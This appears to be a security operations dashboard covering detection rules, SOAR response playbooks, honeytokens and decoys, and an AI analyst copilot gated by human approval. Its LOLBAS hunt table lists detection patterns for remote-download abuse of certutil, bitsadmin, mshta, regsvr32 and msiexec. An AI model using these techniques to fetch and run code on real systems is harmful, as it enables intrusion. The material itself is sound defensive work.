Security Operations

SecOps Center

🍯 Deception / Honeypot — roadmap

Decoy services (SSH · HTTP · DB · file-share) and honeytokens (AWS keys · DB rows · canary URLs) that scream the moment anyone touches them. Zero false positives by design — anyone interacting with a decoy is confirmed malicious.

Decoy daemon (k8s DaemonSet)
Q3 2026
SSH · HTTP · FTP · DB
Canary-token service
Q3 2026
AWS keys · DB rows · doc URLs
Attacker-profile intel
Q4 2026
aggregated across tenants
SOAR auto-response
Today
via /modules/secops/playbook/execute

Until the deploy layer ships, the “armed decoys” you see referenced in the Deception & Hunt Pack tabs reflect design state, not live listeners in your VPC. We won’t ship a fake “Deploy Honeypot” button that mutates ephemeral server-side state and pretends to stand up real infra.

🕸 Hunt Pack — attacker-tool detection

Four hunt packs the SOC runs continuously. Every detection is git-versioned, ATT&CK-tagged, and CI-tested. Green signals are validated in last 90d.

🎭 LOLBAS Execution Hunt (T077)

Living-off-the-land binaries with web URLs or encoded args: certutil · bitsadmin · mshta · rundll32 · regsvr32 · wmic · msiexec. High-severity detect, SOAR auto-isolate.

Rules deployed
14 / 14
ATT&CK T1218 · T1105
Last 90d validated
12
purple-team tested
Hits (7d)
populates per tenant
Auto-isolated
3
confirmed malicious
RuleBinaryPatternLast firedFP rate
LOLBAS-certutil-webcertutil.exe-urlcache · -split · -f http*2h ago2%
LOLBAS-bitsadmin-transferbitsadmin.exe/transfer · /download http*yday0%
LOLBAS-mshta-js-vbsmshta.exejavascript: · vbscript:38m ago1%
LOLBAS-rundll32-suspiciousrundll32.exejavascript: / no-dll / url arg6h ago4%
LOLBAS-regsvr32-scrobjregsvr32.exe/s /n /u /i:http* scrobj.dll3d ago0%
LOLBAS-msiexec-web-installmsiexec.exe/i http*yday2%
🔥 ETW-Tamper / Event-Log-Clear (T079)

EID 1102 (log cleared) · ETW provider-stop · EventLog service manipulation — any of these is a P0 incident. One of the last things an attacker does before leaving.

Rules deployed
6 / 6
ATT&CK T1070.001 · T1562.006
EID 1102 (7d)
1
legit admin · verified
ETW-provider stops
0
baseline
EventLog svc stop
0
baseline
SignalEID / sourceLast seenVerdict
Security log clearedEID 1102yday · SRV-PATCH-02admin · verified
ETW Microsoft-Windows-DotNETRuntime stoppedETW-stopnever
EventLog service disabledEID 7040 · svc-changenever
Audit-policy weakenedEID 471914d agoreverted
⚙️ Sysmon Config Deployment (T080)

SwiftOnSecurity-base tuned <5% FP per host. Process · network · image-load · file-create visibility across the fleet. Feeds every other hunt pack.

Hosts with Sysmon
99.1%
of Win fleet
Config version
v14.2
signed, git-versioned
Events/sec (avg)
populates on ingest
FP rate (host avg)
3.2%
target < 5%
Event IDPurposeVolume (7d)Drives rule
1 · ProcessCreateProcess lineage124MLOLBAS · suspicious parent-child
3 · NetworkConnectProcess → net86MBeaconing · DNS tunnel
7 · ImageLoadDLL loads218MBYOVD · DLL hijack
10 · ProcessAccessHandle opens14MLSASS dump detect
11 · FileCreateDropped payloads42MPersistence · MoTW
13 · RegistryValueSetRun keys / hijacks28MPersistence sweep
22 · DNSQueryResolver calls312MDGA · DNS tunneling
🪝 Nightly Persistence Sweep (T084)

Scheduled tasks · run-keys · WMI event-sub · cron · systemd-timer · services · browser extensions. Any unsigned or unbaselined artifact raised.

Hosts swept (24h)
4,412
of fleet
Net-new artifacts
18
triage queue
Confirmed benign
11
baselined
Suspicious
2
→ incident
ArtifactHostKindSignedVerdict
HKCU\Run\Updater42WS-4218Run-keyINVESTIGATE
Task \Microsoft\UpdateOrchestrator\xWS-812Scheduled task✓ Microsoftbaselined
wmi:__EventFilterSRV-DB1WMI event-subINVESTIGATE
~/Library/LaunchAgents/com.zoom.ZoomDaemonMAC-118LaunchAgent✓ Zoombaselined
/etc/systemd/system/datadog-agent.service.d/overrideSRV-K8S-02systemd-drop-in— (staff)approved · CR-2198
🧠 Detection & Response Core

The graph is the platform. Every signal normalised, correlated, ranked — seventeen alerts about one thing collapse to one incident with a criticality score.

Data-lake hot
90d
OCSF normalised
Events / sec
peak · streaming
Incidents (24h)
14
from 3,412 alerts
ATT&CK coverage
populates after BAS run
🧊 OCSF-Normalised Data Lake (T200)

Every source piped to one schema. 90d hot + 7y cold. Cheap query. WORM + hash-chain for chain-of-custody.

TierRetentionCost / GB-monthQuery latencyState
Hot (recent)90d$0.028p95 < 2sLIVE
Warm180d → 1y$0.008p95 < 15sLIVE
Cold (S3 Glacier)7y$0.00183-5h restoreLIVE
Chain-of-custody7yWORM + hash-chainVERIFIED
🌊 Universal Streaming Ingest (T201)

Kafka · OTEL · Fluent-bit. Pub-sub topology. Schema-registry. Back-pressure monitored.

PipelineSourceRateBack-pressureSchema
edr-eventsEDR (all OS)84k/s0 · healthyOCSF · v1.2
cloud-auditAWS/GCP/Azure42k/s0OCSF
identity-eventsOkta + Entra + Google18k/s0OCSF
network-flowNDR + VPC-flow62k/s0OCSF · extended
app-accessWAF + API gateway12k/s0OCSF
container-runtimeFalco · Tetragon6k/s0OCSF · k8s
🕸 Unified Correlation Graph (T202)

Nodes: identity · asset · signal · activity. Edges: has-session-on · authenticated-as · emitted-from · chains-to. Cypher-like query collapses N alerts → 1 incident.

Entity typeNodesEdgesLast rebuildState
Identity (users + NHI + sessions)8,21442,182streamingLIVE
Assets (hosts + cloud + SaaS)12,84768,412streamingLIVE
Signals (alerts + IOCs + vulns)2.3M (24h)streamingLIVE
Activities (logins · API · builds)86M (24h)streamingLIVE
🎯 Incident-Not-Alert Workflow (T203)

Auto-group by entity + time-window. Criticality score 0-10. Owner auto-assigned. Alert-to-incident compression ≈ 240:1 today.

IncidentEntityAlerts collapsedScoreOwnerState
INC-4431[user.name]@[your-org].com479.6soc-l2OPEN
INC-4430svc-backup-old (honey)410.0soc-l3IR engaged
INC-4429WS-4218 (endpoint)317.2soc-l2TRIAGING
INC-4428edge-old-01.[your-org].com126.8soc-l1CONTAINED
INC-4427[your-org]-devops-sbx (cloud)85.4soc-l1MONITORING
📜 Detection-as-Code Repo (T204)

Git-versioned · CI-tested · Sigma / KQL / YARA-L · ATT&CK-tagged · PR-reviewed. No console-edits survive.

Repo statCountHealth
Active detections482all CI-green
ATT&CK tagged482 (100%)fully mapped
Unit-tested (true-positive + false-positive)442 (91%)target 100% by Q2
Tuning PRs merged (30d)86healthy cadence
Rules auto-disabled (FP > 10%)4author-repair
🗺 ATT&CK Coverage Heatmap (T205)

13 tactics × sub-techniques. Green = validated in last 90d via purple-team or BAS. Red = untested. Monthly gap closure tracked.

TacticTechniques in scopeWith detectionTested 90dCoverage
Initial Access24222188%
Execution14141393%
Persistence16151488%
Privilege Escalation14131179%
Defense Evasion1311969%
Credential Access14141393%
Discovery1210867%
Lateral Movement12111083%
Collection97667%
C2 / Exfil13121185%
Impact12121192%
📊 UEBA — Entity-Based Peer-Group Anomaly (T206)

Each user / host / service-account has a peer-group baseline. Score is explainable (which dimensions caused it).

EntityPeer groupAnomaly dimensionsScoreState
svc-backup-oldservice accts · OLDlogin attempt · never-used10.0P0 honey
[user.name]@[your-org].comeng-senior · bangalorenew-ASN + cookie-replay + geo-velocity9.4AiTM suspected
pod:analytics-42analytics-podssecret.get spike · cross-NS reach7.2investigate
vendor-bob@3pa.ioguest-acctsafter-hours bulk S3-list6.8TRIAGING
WS-4218eng-laptopsLSASS-access by unsigned binary8.4isolated
🧵 Threat-Intel Fabric (T207)

OpenCTI / MISP backend. Auto-enrich every alert. Confidence + decay. IOCs age-out by class.

SourceIOCs (live)Last syncConfidenceDecay
CISA KEV1,412streamingHIGHnever
MISP (community)48,2145m agoMED-HIGH180d
Mandiant12,8041h agoHIGH90d
Anomali ThreatStream86,412streamingMIXED30-180d
Internal observations4,218streamingHIGH90d
Sector-ISAC sharing2,4024h agoHIGH90d
🎯 Hunt-as-Code — Recurring Hypotheses (T208)

Named hypothesis → query → schedule → finding → detection promoted to rule. Every hunt has a theory, not a keyword.

HypothesisCadenceLast runFindings (30d)Promoted → rule
Long-dwell process under explorer.exedaily04:12 today2 · both benignpending
Unusual parent → PowerShell chainhourlystreaming18 · 1 confirmedDET-0418
Azure AD graph-API bulk readdaily03:00 today4 · 1 confirmedDET-0419
OAuth token minted by first-time apphourlystreaming11 · 0 confirmedpending FP review
S3 mass-list from new IPhourlystreaming6 · 1 confirmedDET-0421
⏱ Incident Timeline-Builder (T209)

Auto-assembles events from graph. Narrative generated by Tier-4 copilot. Analyst edits before handoff.

CapabilityStatusDetail
Auto-assembled from graphONpulls all entity-linked events within ± 2h window
Natural-language narrativeONcopilot-draft, analyst-reviewed before send
Evidence chain-of-custodyONWORM · hash-chained · exportable ZIP
One-click export · legal + regulatorONPDF + signed manifest
👍 Alert Feedback Loop (T210)

Analyst thumbs-up / thumbs-down → rule tuning. FP rate auto-tracked per rule. Consistently-FP rules auto-disabled; author must repair.

RuleFires (7d)TP %FP %Action
DET-0418 · PowerShell chain12492%8%KEEP
DET-0402 · LSASS-access unsigned18100%0%KEEP · CRIT
DET-0381 · service-install unsigned41248%52%AUTO-DISABLED
DET-0294 · S3 mass-list6288%12%TUNE · peer baseline
DET-0198 · web shell signature4100%0%KEEP
🟣 BAS — Breach & Attack Simulation (T211)

Weekly safe-attack against self. Coverage delta drives next-sprint detection work. Purple-team owner feeds back.

ScenarioWhenResultATT&CKGap opened
AiTM phish + session replaythis weekDETECTED · 47sT1557.0030
LOLBAS · certutil web downloadlast weekBLOCKEDT1218.0030
Kerberoast · honey-SPN2 weeks agoDETECTED · 6sT1558.0030
S3 mass exfil via leaked key3 weeks agoDETECTED · 32mT15301 · shrink latency
K8s privilege pod escape4 weeks agoBLOCKED · PSAT16110
🤖 SOAR — Autonomous Response

If an analyst does it twice a week, it's a playbook. Human-in-the-loop tiers: L1 auto, L2 propose-approve, L3 review-only.

Playbooks live
18
git-versioned
Auto-actions (7d)
L1 auto-execute
Proposed → approved
94%
L2 queue
Mean-time-to-contain
46s
trigger → action
🚫 Playbook: Disable User + Revoke Sessions (T220)

Triggered by ITDR + UEBA high-confidence signals. L1 auto. Reversible in one click.

StepActionSystemRollback
1Mark user "at risk" in identity graphOkta + Entraclear flag
2Revoke all active sessions + refresh tokensOkta · Entra · M365re-auth required
3Force FIDO2 on next loginConditional Accesspolicy revert
4Disable basic-auth + app-password fallbackM365 · Googlepolicy revert
5Notify manager + user via out-of-bandSlack · SMS
6Open incident + attach timelinesecops graph

Latest runs (7d): 47 · confirmed malicious 12 · false-positive analyst-reversed 3.

🛑 Playbook: Isolate Host / Network-Contain (T221)

Fires on ransomware behaviour · LSASS-access by unsigned binary · BYOVD. L1 auto. 1-click revert for false-positive.

StepActionSystemImpact
1EDR network-contain host (allow only EDR cloud)CrowdStrike / MDEhost isolated
2Revoke all active identity sessions originating from hostOkta · Entrare-auth required
3Snapshot memory + disk for forensicsEDR forensicevidence preserved
4Quarantine matching hashes fleet-wideEDRlateral spread blocked
5Open incident + attach timeline + IOCssecops graph
6Page on-call + DM userPagerDuty · Slackhuman loop engaged

Latest runs (7d): 14 · confirmed malicious 8 · reversed 1.

🔑 Playbook: Kill Token / Rotate Secret (T222)

Fires on gitleaks / trufflehog match in any repo, fork, or gist. Auto-rotate + auto-PR to codebase. L1 auto.

StepActionSystemNotes
1Revoke leaked secret at originAWS IAM · GCP IAM · GitHub · Stripe · SendGrid · Slack webhookidempotent
2Generate replacement secret (short-lived preferred)provider APIOIDC where possible
3Update secret store (Vault / AWS SM / GCP SM)secrets manager
4Open PR to replace usage in codeGitHubauto-approved if test-only
5Audit usage of old secret (24h back-scan)cloud-audit · app logslook for abuse
6Attach evidence to incident + notify ownersecops graph · Slack

Latest runs (30d): 42 · mean rotation SLA 3h 12m · evidence of abuse before rotation: 0.

🚫 Playbook: Block IP / Domain Edge-Wide (T223)

One analyst click → propagate to WAF + DNS RPZ + egress firewall + EDR. Ages-out on a default TTL unless manually re-signed.

StepActionSystemTTL
1Add IOC to block-listWAF (Cloudflare / Akamai)30d default
2Sinkhole in DNSUmbrella / internal RPZ30d
3Egress-deny entrySASE · firewall30d
4EDR containment indicatorCrowdStrike / MDE90d
5Audit prior connections (14d back-scan)data lake
6Open incident + share to ISAC (anonymised)secops graph + MISP

Latest runs (7d): 62 · mean propagation 8s · aged-out reversibility 100%.

📧 Playbook: Quarantine Mail Org-Wide (T224)

Graph API driven M365 + Google. Matches on subject/sender/URL hash. Purge from every mailbox. Reversible from evidence vault.

StepActionSystemScope
1Fingerprint matching message (subject + sender + URL hashes)M365 Graph · Gmail APIorg-wide
2Soft-delete from all inboxes + Junk + Sentcompliance APIorg-wide
3Preserve copy in evidence vaultlegal-holdreversible
4Block sender + URL at gatewayProofpoint / mimecast / native
5Notify recipients who clicked (via reporter)Slack · emailtargeted
6Open incident + attach evidencesecops graph

Latest runs (30d): 24 · mailboxes cleaned 8,412 · click-rate-post-purge 0.

🎣 Playbook: Phishing-Report Auto-Triage (T225)

User-report button → URL + attachment detonate in sandbox → verdict in < 3 min → bulk-remove if malicious. User gets thank-you with outcome.

StepActionSystem
1User "Report Phish" → message parsedOutlook/Gmail add-in
2URLs extracted → URLScan + sandboxurlscan.io · Joe Sandbox · native detonator
3Attachments → static + dynamic analysisdetonator · YARA
4Verdict aggregated · score 0-100triage copilot
5If malicious → invoke T224 quarantine-mailSOAR chain
6User receives outcome DM + stats badgeSlack · email

This month: reports 284 · malicious 62 · mean triage time 2 m 18 s · user-satisfaction 4.8 / 5.

🧨 Playbook: OAuth-App Mass-Revoke (T226)

When a malicious-consent pattern is detected, revoke across the org in a single action. Stored revert for false-positive.

StepActionSystem
1Identify consenting user cohortidentity graph
2Revoke OAuth grant org-wideM365 Graph · Google admin · Slack
3Kill active sessions from that appOkta · Entra
4Audit last 30d access by the appdata lake
5Notify consenting users + explainSlack · email
6Open incident + evidence bundlesecops graph

Recent: 3 org-wide revokes in 30d · users re-onboarded with vetted alternatives in mean 9 h.

🧑‍✈️ HITL Tiers — L1 auto / L2 propose / L3 review-only (T227)

Every playbook declares its tier. L1 runs on its own + logs; L2 proposes the action and waits for one-click approval; L3 is read-only — copilot drafts the proposal, human executes.

PlaybookTierWhyMean time
Disable user + revoke sessions (T220)L1 autohigh-confidence + reversible46s
Isolate host (T221)L1 autohigh-confidence + reversible38s
Rotate leaked secret (T222)L1 autozero-harm · strictly better3h 12m (full chain)
Block IOC edge-wide (T223)L2 proposescope could affect business traffic2m 14s to approval
Quarantine mail org-wide (T224)L2 proposecommunication impact1m 48s
OAuth app mass-revoke (T226)L3 reviewworkflow impact · cross-team14 min
Delete storage / kill serviceL3 reviewdestructivehuman-only
↩️ Rollback + Restore Orchestration (T228)

Every auto-action has an inverse. Dry-run mode for auditors. Monthly restore rehearsal.

ActionInverseDry-runLast rehearsed
Disable userre-enable + re-authenticate3d ago
Host isolateEDR release + allow-list restore5d ago
Rotate secretrotate-again (short-lived forever)today
Block IOCallow-list + age-out2d ago
Quarantine mailrestore from vault11d ago
Revoke OAuth grantuser-reconsent with scoped re-approval9d ago
🎫 Auto-Ticket + Evidence Bundle to ITSM (T229)

Every incident auto-files a JIRA / ServiceNow ticket with timeline, IOCs, artifacts, suggested actions, and evidence ZIP.

FieldContents
TitleINC-{id} · {criticality} · {entity} — auto-summary
Timelinegraph-assembled events with copilot narrative
IOCsIP · domain · hash · URL · user · host · ASN
Artifactsmemory-dump · disk-snap · mail-eml · packet-capture · audit-log
Suggested actionsplaybook IDs ready to run · prerequisites met/missing
Evidence ZIPchain-of-custody hash · signed manifest · 7y WORM retention
Assigneesauto-routed by entity ownership + tier
🎣 Deception & Honeytokens

The cheapest best-ROI detection we own. Fake creds, fake repos, fake files, fake roles — anyone touching them is confirmed malicious. Zero false positives by design.

Active canaries
48
across 8 classes
Trips (30d)
3
all confirmed malicious
False positives
0
by design
Last rotation
6d ago
stays fresh
🪤 AWS Canary IAM Credentials (T240)

Canarytoken-style access-key seeded in env files, S3 buckets, wiki, CI runner. Any use = P0. Auto-rotated weekly to stay fresh.

Canary IDSeeded whereLast rotationLast tripState
AKIA…xoym.env.example · prod-docs-wiki3d agoneverARMED
AKIA…bzt4s3://[your-org]-devops-scratch/config.yml3d ago8h ago ⚠TRIPPED · investigating
AKIA…k1lnci-runner env-vars (fake)3d agoneverARMED
AKIA…9fj2legacy-repo README.md3d agoneverARMED
🧑‍✈️ Canary Identity — AD / Entra / Okta (T241)

Plausible admin account, never used. Any auth attempt = P0. Cross-listed with ITDR + AD/Entra tabs.

Canary accountTenantPrivilege lureLast authState
svc-legacy-bckupAD corpDomain AdminsneverARMED
temp-contractor-DAAD corpEnterprise AdminsneverARMED
ga-old@[your-org].comEntraGlobal Administrator2d ago ⚠TRIPPED
admin-helpdesk-xOktaHelpdesk admin + app-writeneverARMED
📄 Canary Document — Tracking-Pixel (T242)

"Confidential" PDF/docx seeded in shared drives + "private" SharePoint. Opening a doc phones home with source-IP + geo.

DocumentLocationOpens (all-time)Last openState
2026 Compensation · Board Copy.pdfSharePoint · Exec/Confidential0neverARMED
AWS-Prod-Runbook-v2.docx\\fileshare\sre0neverARMED
Board-pack Q4-26 · draft.pdfGoogle Drive · Board folder0neverARMED
Acquisition-targets · confidential.xlsxM365 SharePoint · Strategy0neverARMED
🐙 Canary GitHub Repo (T243)

Private honey-repo inside our org. Looks real, contains canary secrets. Any clone / secret-use = attacker confirmed.

RepoDescription (lure)Last cloneSecret useState
acme/platform-legacy-env"retired legacy env vars — do not use"nevernoARMED
acme/aws-prod-secrets"do not commit real secrets here"nevernoARMED
acme/internal-ops-scripts"sre ops scripts · internal"nevernoARMED
🎟 Kerberoastable Honey-SPN (T244)

Service account with an SPN and a weak-looking password. Any TGS-REQ targeting it = red alert, zero false positives.

Honey-SPNLureLast TGS-REQState
svc-legacy-bckup · HTTP/backup-srvbackup service · rotated 2014 hint12d ago ⚠TRIPPED · incident open
svc-sql-reporter · MSSQL/reporter-srvSQL reporting svcneverARMED
svc-fax-gateway · SMTP/fax-srvlegacy fax gatewayneverARMED
🧪 Honey-DB / Honey-Records (T245)

Fake "salaries" table or "customers_staging". Honey-records with canary-triggers. Any SELECT = incident.

ObjectDB / tenantRowsLast readState
hr.salaries_2026_drafthr-prod-pg · seed412 fakeneverARMED
billing.customers_stagingbilling-prod1,024 fakeneverARMED
kyc.docs_legacykyc-prod42 fakeneverARMED
🎯 Honey-API Endpoint (T246)

404-by-default for humans. Any non-allow-listed call = alert. Classic /admin / /debug / /v1/internal lures.

EndpointHostHits (30d)Last hitState
/adminapi.[your-org].com142h agoALERT · bot scan
/debug/dumpapi.[your-org].com6ydayALERT
/v1/internal/testapi.[your-org].com33d agoLOG
/.git/configwww.[your-org].com42streamingALERT · scan pattern
🪣 Honey-Bucket / Honey-S3-Key in CI Runner (T247)

Catches supply-chain implants that try to exfil from CI runner env. The bucket never holds real data; any read = malicious.

Token / bucketSeeded locationLast touchState
s3://acme-ci-runner-secretsCI runner env-varneverARMED
AKIA…9v2f (canary)CI runner env-varneverARMED
DOCKER_REGISTRY_TOKEN (canary)CI runner env-varneverARMED
URL https://callback.canarytokens.org/x…ci-runner /etc/hosts overrideneverARMED
🕳 Decoy Subdomains → Honeypot / Tarpit (T248)

Register obvious-looking legacy subdomains (dev-old., staging-backup., admin-legacy.) pointing to a honeypot. Any scanner hit is logged + profiled. Optional retaliatory tarpit drops attacker scan speed to <1 rps.

SubdomainBait kindHits (7d)Top sourceState
dev-old.[your-org].comfake WP-admin login212AS45090 HKSCANNED · profiled
staging-backup.[your-org].comphpMyAdmin lookalike84Tor exitsSCANNED
admin-legacy.[your-org].comfake JIRA login48AS9009 ROTARPIT · 0.3 rps
internal-docs.[your-org].comSSO login form (canary)14mixedCRED-HARVEST attempt
vpn-old.[your-org].comFortinet login banner42AS62240 NLN-day probe

Signatures fed to WAF + DNS block-list + ISAC share. All traffic is by definition malicious — zero FP.

🤝 Analyst Copilot (Tier 4)

AI multiplies the analyst — it does not replace them. The copilot lives inside the protection perimeter: same scoping, audit, and egress controls as any privileged user.

Analyst throughput
3.1×
actions / day vs pre-copilot
Queries (30d)
NL → data-lake
Auto-drafted reports
312
all human-edited
Tool-call interstitials
842
dangerous → approved
🧹 Triage Copilot — Cluster · Enrich · Recommend (T260)

Groups related alerts, pulls threat-intel enrichment, suggests next-action with confidence score. Analyst confirms or overrides.

CapabilityStatusLatency
Alert clustering by entity + time-windowLIVE< 400 ms
TI enrichment (IOCs → reputation + sightings)LIVE< 1 s
Next-action recommendation with confidence + rationaleLIVE~ 3 s
Similar-past-incidents retrieval (vector search)LIVE~ 2 s
One-click override with outcome logged back for tuningLIVE
🎯 Hunt Copilot — NL → Query (T261)

"Show hosts that beaconed to TLDs we've never seen in 30 days" → generated SQL/KQL + result. Analyst learns the dialect from the outputs.

Natural-language askGenerated query (abbrev.)Latency
beaconing to unseen TLDs 30dWITH new_tlds AS …2.1 s
users who logged in from > 3 countries last weekGROUP BY user HAVING COUNT(DISTINCT country) > 30.9 s
any EC2 without IMDSv2 in prodcnapp.ec2 WHERE imds_v2_required=false0.6 s
PowerShell encoded-cmd parent ≠ explorerprocess_create WHERE image='powershell.exe' AND …1.4 s
🔍 Explain-the-Alert — Lineage + Signal Path (T262)

"Why did this fire?" — walks the chain: rule → data-source → raw events → ATT&CK tag → similar past incidents → suggested next question.

Output sectionPurpose
Rule → data-source chainwhat sensor + normalisation step surfaced this
Raw events windowprev/next 10 events for that entity
ATT&CK taggingtactic / technique / sub-technique with confidence
Similar past incidents (vector)human-playbook that resolved it last time
Suggested next querynarrows the uncertainty by one step
📝 Response Copilot — Draft Comms + Playbook Author (T263)

Exec summary, user comms, legal-ready timeline, regulator notice. Redlined by analyst before send. No auto-send on anything human-bound.

ArtefactTemplate sourceHuman-review required
Exec summary (1-pager)board-facing template✓ required
Affected-user DM + emailplain-language template✓ required
Legal / breach-coach timelinelegal-ready narrative✓ required
Regulator notice (72 h)DPDP · GDPR · SEC 8-K · HIPAA✓ + legal-sign-off
New playbook draft (YAML)detection-as-code repo✓ + PR review
📊 Report Copilot — Monthly Board Report (T264)

Pulls 8 board metrics + top incidents + roadmap deltas. Auto-PDF. Editable before share.

SectionSource
MTTD · MTTR · dwell · blast-radiusincident graph (T203)
ATT&CK coverage %heatmap (T205)
Phishing click + report ratehuman-security
Edge-patch SLACTEM
Analyst throughput deltathis copilot pane
Top incidents narrativecopilot-drafted · analyst-approved
Roadmap progress vs planbuild-order checklist
💡 Hypothesis-Gen Copilot (T265)

Given last 7 days telemetry deltas, proposes five untested hunt hypotheses. Best ones graduate to hunt-as-code (T208).

This week's suggestionsWhy
Unusual Azure Graph read-rate by first-use appsnew tenant apps surged 18% · not yet monitored
Snowflake SHOW WAREHOUSES by non-adminsattacker-reconnaissance pattern recently published
New parent-child pattern: signed.exe → lolbas.exegap in ATT&CK Defense Evasion (69% coverage)
Kubernetes exec into pod by first-seen ServiceAccountnew SAs in prod-eks-1 last week
OIDC token minted for workload outside approved-IPexpanding OIDC use — drift expected
📜 Copilot Audit Log — UEBA on the Agent (T266)

Every tool-call, prompt, output, and override is logged. Same scrutiny as a privileged Linux shell. 7y retention. Analyst anomaly baselines apply.

FieldCaptured
User + session + copilot model version✓ per turn
Full prompt (system + user) + retrieved context✓ hash + content
Every tool invocation + arguments✓ pre-call + post-call
Output streamed back to user
Human override / acceptance of suggestion✓ outcome feeds tuning
UEBA on agent trails✓ same peer-baseline engine
🧑‍✈️ Tool-Call Interstitial — Dangerous Actions Require Human (T267)

No model-autonomous isolate / delete / send. An interstitial UI confirms the action, shows the audit record, and records the approving user. The model can propose; only a human disposes.

Action classInterstitial?Why
Read-only query on the lakenozero-harm
TI / IOC enrichmentnozero-harm
Draft message / playbooknono-send
Disable user · isolate host · rotate secretYESreversible but impactful
Quarantine mail org-wideYEScommunication impact
Delete / destroy data · send to external recipientHARD BLOCKnever by model · L3 human-only